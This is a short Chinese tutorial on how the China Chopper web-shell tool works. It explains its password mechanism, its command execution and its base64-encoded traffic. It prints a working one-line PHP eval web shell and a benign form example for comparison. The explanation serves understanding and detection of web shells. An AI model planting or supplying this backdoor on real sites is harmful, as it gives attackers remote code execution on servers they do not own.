對于玩***的人來說 一句話 中國菜刀 肯定不陌生 那么菜刀到底是怎么樣判斷他的密碼呢? 如何列目錄的呢? 我們一一來進行科普下。
一句話:<?php @eval($_POST[fuck])?>
這是php的一句話密碼。不懂的人來說 這怎么樣是***呢? 這明明是正常的php語法。別著急,慢慢講解。
上面的一句話是服務端 也就是說 他等待post提交變量名fuck的數據
現在是逆向思維 我們先用正向思維去看
<form action="a.php" method="post">
name: <input type="text" name="fuck" />
<input type="submit" />
</form>
www.a.com/a.php
Welcome <?php echo $_POST["fuck"]; ?>.<br />
這個代碼 你們肯定都熟悉 post提交變量名為fuck的數據給a.php 之后輸出
那菜刀就是你先把接受端上傳到服務器 之后我們自己提交數據給接收端
例:<?php @eval($_POST[fuck])?>
那么提交的時候肯定是post提交數據 之后執行的相應的代碼,比如說列目錄?寫文件?等等 fuck=.......代碼 接收端接受到之后eval執行 執行之后會出現相應值。那么菜刀再去讀取。
至于密碼這里 我這樣解釋了 相信大家也看的清楚了 為何還有密碼這個說法。 因為接收端的fuck,你輸入123的變量去提交 接受端不認識123變量是什么 那里來的,所以就無法執行。
菜刀通訊加密使用base64
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。